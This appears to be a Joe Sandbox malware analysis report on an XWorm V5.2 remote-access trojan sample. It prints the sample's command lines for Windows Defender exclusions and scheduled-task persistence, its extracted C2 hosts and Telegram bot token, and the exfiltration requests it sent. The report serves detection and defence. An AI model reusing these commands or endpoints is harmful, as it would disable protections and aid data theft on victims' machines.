Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ozgpPwVAu1.exe

Overview

General Information

Sample name:ozgpPwVAu1.exe
renamed because original name is a hash value
Original sample name:622b720c1733ce7dfd2e1d5f11f9c0c8bd93f11fcae3341a5db5b8a03cca7968.exe
Analysis ID:1570394
MD5:784bd7f714cf13880f47c591e7aed7fa
SHA1:66c44c447a49221b5e61e9552012db6420f561e9
SHA256:622b720c1733ce7dfd2e1d5f11f9c0c8bd93f11fcae3341a5db5b8a03cca7968
Tags:exeuser-Chainskilabs
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates files with lurking names (e.g. Crack.exe)
Drops PE files to the user root directory
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • ozgpPwVAu1.exe (PID: 7644 cmdline: "C:\Users\user\Desktop\ozgpPwVAu1.exe" MD5: 784BD7F714CF13880F47C591E7AED7FA)
    • adawsfaefasfasfg.exe (PID: 7732 cmdline: "C:\Users\user\adawsfaefasfasfg.exe" MD5: 190010C187189B92E49A0ED05F6DDC88)
      • powershell.exe (PID: 8024 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1020 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'adawsfaefasfasfg.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2188 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Systen User' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4080 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Systen User' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 8108 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Systen User" /tr "C:\Users\user\AppData\Roaming\Systen User" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wasdwasfwasfs.exe (PID: 7756 cmdline: "C:\Users\user\wasdwasfwasfs.exe" MD5: 34452F83F7D58EC91D2CEDF4B24C9764)
      • powershell.exe (PID: 8032 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\wasdwasfwasfs.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7572 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wasdwasfwasfs.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7780 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\PIN CRACKER V2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7832 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • where.exe (PID: 7848 cmdline: where curl MD5: 3CF958B0F63FB1D74F7FCFE14B039A58)
  • Systen User (PID: 4872 cmdline: "C:\Users\user\AppData\Roaming\Systen User" MD5: 190010C187189B92E49A0ED05F6DDC88)
  • OpenWith.exe (PID: 5804 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • svchost.exe (PID: 5716 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
{"C2 url": ["127.0.0.1", "carolina-comes.gl.at.ply.gg", "147.185.221.22"], "Port": 12886, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg", "Telegram Chatid": "7538845070", "Version": "XWorm V5.2"}
{"C2 url": "https://api.telegram.org/bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\wasdwasfwasfs.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
      C:\Users\user\wasdwasfwasfs.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\wasdwasfwasfs.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\wasdwasfwasfs.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            C:\Users\user\wasdwasfwasfs.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x8046:$s6: VirtualBox
            • 0x7fa4:$s8: Win32_ComputerSystem
            • 0x89f6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x8a93:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x8ba8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x86a4:$cnc4: POST / HTTP/1.1
            Click to see the 10 entries
            SourceRuleDescriptionAuthorStrings
            00000003.00000002.2591449977.0000000002F05000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0x86f4:$s6: VirtualBox
                  • 0x8652:$s8: Win32_ComputerSystem
                  • 0x90d4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0x9171:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0x9286:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0x8d4c:$cnc4: POST / HTTP/1.1
                  00000002.00000002.2592447973.0000000003081000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                    Click to see the 13 entries
                    SourceRuleDescriptionAuthorStrings
                    3.0.wasdwasfwasfs.exe.c80000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      3.0.wasdwasfwasfs.exe.c80000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                        3.0.wasdwasfwasfs.exe.c80000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                          3.0.wasdwasfwasfs.exe.c80000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                          • 0x8046:$s6: VirtualBox
                          • 0x7fa4:$s8: Win32_ComputerSystem
                          • 0x89f6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          • 0x8a93:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                          • 0x8ba8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                          • 0x86a4:$cnc4: POST / HTTP/1.1
                          0.2.ozgpPwVAu1.exe.2d3e598.2.unpackJoeSecurity_XWormYara detected XWormJoe Security
                            Click to see the 24 entries

                            System Summary

                            barindex
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\adawsfaefasfasfg.exe" , ParentImage: C:\Users\user\adawsfaefasfasfg.exe, ParentProcessId: 7732, ParentProcessName: adawsfaefasfasfg.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe', ProcessId: 8024, ProcessName: powershell.exe
                            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\adawsfaefasfasfg.exe" , ParentImage: C:\Users\user\adawsfaefasfasfg.exe, ParentProcessId: 7732, ParentProcessName: adawsfaefasfasfg.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe', ProcessId: 8024, ProcessName: powershell.exe
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Systen User, EventID: 13, EventType: SetValue, Image: C:\Users\user\adawsfaefasfasfg.exe, ProcessId: 7732, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Systen User
                            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\Systen User", CommandLine: "C:\Users\user\AppData\Roaming\Systen User", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Systen User, NewProcessName: C:\Users\user\AppData\Roaming\Systen User, OriginalFileName: C:\Users\user\AppData\Roaming\Systen User, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Systen User", ProcessId: 4872, ProcessName: Systen User
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\adawsfaefasfasfg.exe" , ParentImage: C:\Users\user\adawsfaefasfasfg.exe, ParentProcessId: 7732, ParentProcessName: adawsfaefasfasfg.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe', ProcessId: 8024, ProcessName: powershell.exe
                            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\adawsfaefasfasfg.exe, ProcessId: 7732, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systen User.lnk
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Systen User" /tr "C:\Users\user\AppData\Roaming\Systen User", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Systen User" /tr "C:\Users\user\AppData\Roaming\Systen User", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\adawsfaefasfasfg.exe" , ParentImage: C:\Users\user\adawsfaefasfasfg.exe, ParentProcessId: 7732, ParentProcessName: adawsfaefasfasfg.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Systen User" /tr "C:\Users\user\AppData\Roaming\Systen User", ProcessId: 8108, ProcessName: schtasks.exe
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\adawsfaefasfasfg.exe" , ParentImage: C:\Users\user\adawsfaefasfasfg.exe, ParentProcessId: 7732, ParentProcessName: adawsfaefasfasfg.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe', ProcessId: 8024, ProcessName: powershell.exe
                            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5716, ProcessName: svchost.exe
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-06T22:45:53.124203+010028536851A Network Trojan was detected192.168.2.949825149.154.167.220443TCP
                            2024-12-06T22:46:51.511796+010028536851A Network Trojan was detected192.168.2.949958149.154.167.220443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-06T22:46:18.826308+010028528701Malware Command and Control Activity Detected147.185.221.2212886192.168.2.949853TCP
                            2024-12-06T22:46:19.602049+010028528701Malware Command and Control Activity Detected147.185.221.2212886192.168.2.949853TCP
                            2024-12-06T22:46:30.092229+010028528701Malware Command and Control Activity Detected147.185.221.2212886192.168.2.949853TCP
                            2024-12-06T22:46:41.372777+010028528701Malware Command and Control Activity Detected147.185.221.2212886192.168.2.949853TCP
                            2024-12-06T22:46:49.604166+010028528701Malware Command and Control Activity Detected147.185.221.2212886192.168.2.949853TCP
                            2024-12-06T22:46:52.653608+010028528701Malware Command and Control Activity Detected147.185.221.2212886192.168.2.949853TCP
                            2024-12-06T22:47:01.107348+010028528701Malware Command and Control Activity Detected147.185.221.2212886192.168.2.949853TCP
                            2024-12-06T22:47:02.686350+010028528701Malware Command and Control Activity Detected147.185.221.2212886192.168.2.949853TCP
                            2024-12-06T22:47:13.928949+010028528701Malware Command and Control Activity Detected147.185.221.2212886192.168.2.949977TCP
                            2024-12-06T22:47:16.427395+010028528701Malware Command and Control Activity Detected147.185.221.2212886192.168.2.949853TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-06T22:46:18.858988+010028529231Malware Command and Control Activity Detected192.168.2.949853147.185.221.2212886TCP
                            2024-12-06T22:46:30.094220+010028529231Malware Command and Control Activity Detected192.168.2.949853147.185.221.2212886TCP
                            2024-12-06T22:46:41.375960+010028529231Malware Command and Control Activity Detected192.168.2.949853147.185.221.2212886TCP
                            2024-12-06T22:46:52.655477+010028529231Malware Command and Control Activity Detected192.168.2.949853147.185.221.2212886TCP
                            2024-12-06T22:47:01.117066+010028529231Malware Command and Control Activity Detected192.168.2.949853147.185.221.2212886TCP
                            2024-12-06T22:47:13.968839+010028529231Malware Command and Control Activity Detected192.168.2.949977147.185.221.2212886TCP
                            2024-12-06T22:47:15.277941+010028529231Malware Command and Control Activity Detected192.168.2.949853147.185.221.2212886TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-06T22:46:19.602049+010028528741Malware Command and Control Activity Detected147.185.221.2212886192.168.2.949853TCP
                            2024-12-06T22:46:49.604166+010028528741Malware Command and Control Activity Detected147.185.221.2212886192.168.2.949853TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-06T22:46:18.119385+010028559241Malware Command and Control Activity Detected192.168.2.949853147.185.221.2212886TCP

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: ozgpPwVAu1.exeAvira: detected
                            Source: carolina-comes.gl.at.ply.ggAvira URL Cloud: Label: malware
                            Source: C:\Users\user\adawsfaefasfasfg.exeAvira: detection malicious, Label: TR/Spy.Gen
                            Source: C:\Users\user\wasdwasfwasfs.exeAvira: detection malicious, Label: TR/Spy.Gen
                            Source: C:\Users\user\AppData\Roaming\Systen UserAvira: detection malicious, Label: TR/Spy.Gen
                            Source: 00000002.00000002.2592447973.0000000003081000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "carolina-comes.gl.at.ply.gg", "147.185.221.22"], "Port": 12886, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg", "Telegram Chatid": "7538845070", "Version": "XWorm V5.2"}
                            Source: adawsfaefasfasfg.exe.7732.2.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage"}
                            Source: ozgpPwVAu1.exeReversingLabs: Detection: 63%
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Source: C:\Users\user\adawsfaefasfasfg.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\wasdwasfwasfs.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Roaming\Systen UserJoe Sandbox ML: detected
                            Source: ozgpPwVAu1.exeJoe Sandbox ML: detected
                            Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpackString decryptor: 127.0.0.1,carolina-comes.gl.at.ply.gg,147.185.221.22
                            Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpackString decryptor: 12886
                            Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpackString decryptor: <123456789>
                            Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpackString decryptor: <Xwormmm>
                            Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpackString decryptor: XWorm V5.2
                            Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpackString decryptor: USB.exe
                            Source: ozgpPwVAu1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49825 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49958 version: TLS 1.2
                            Source: ozgpPwVAu1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Networking

                            barindex
                            Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.9:49977 -> 147.185.221.22:12886
                            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.9:49853 -> 147.185.221.22:12886
                            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 147.185.221.22:12886 -> 192.168.2.9:49977
                            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.9:49977 -> 147.185.221.22:12886
                            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 147.185.221.22:12886 -> 192.168.2.9:49853
                            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.9:49853 -> 147.185.221.22:12886
                            Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 147.185.221.22:12886 -> 192.168.2.9:49853
                            Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.9:49825 -> 149.154.167.220:443
                            Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.9:49958 -> 149.154.167.220:443
                            Source: Malware configuration extractorURLs: 127.0.0.1
                            Source: Malware configuration extractorURLs: carolina-comes.gl.at.ply.gg
                            Source: Malware configuration extractorURLs: 147.185.221.22
                            Source: unknownDNS query: name: api.telegram.org
                            Source: Yara matchFile source: 3.0.wasdwasfwasfs.exe.c80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.0.adawsfaefasfasfg.exe.eb0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Users\user\wasdwasfwasfs.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\adawsfaefasfasfg.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Systen User, type: DROPPED
                            Source: global trafficTCP traffic: 192.168.2.9:49853 -> 147.185.221.22:12886
                            Source: global trafficHTTP traffic detected: GET /bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage?chat_id=7538845070&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE3C0EEEB514F72781BA2%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ELOET%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage?chat_id=7538845070&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE3C0EEEB514F72781BA2%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ELOET%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
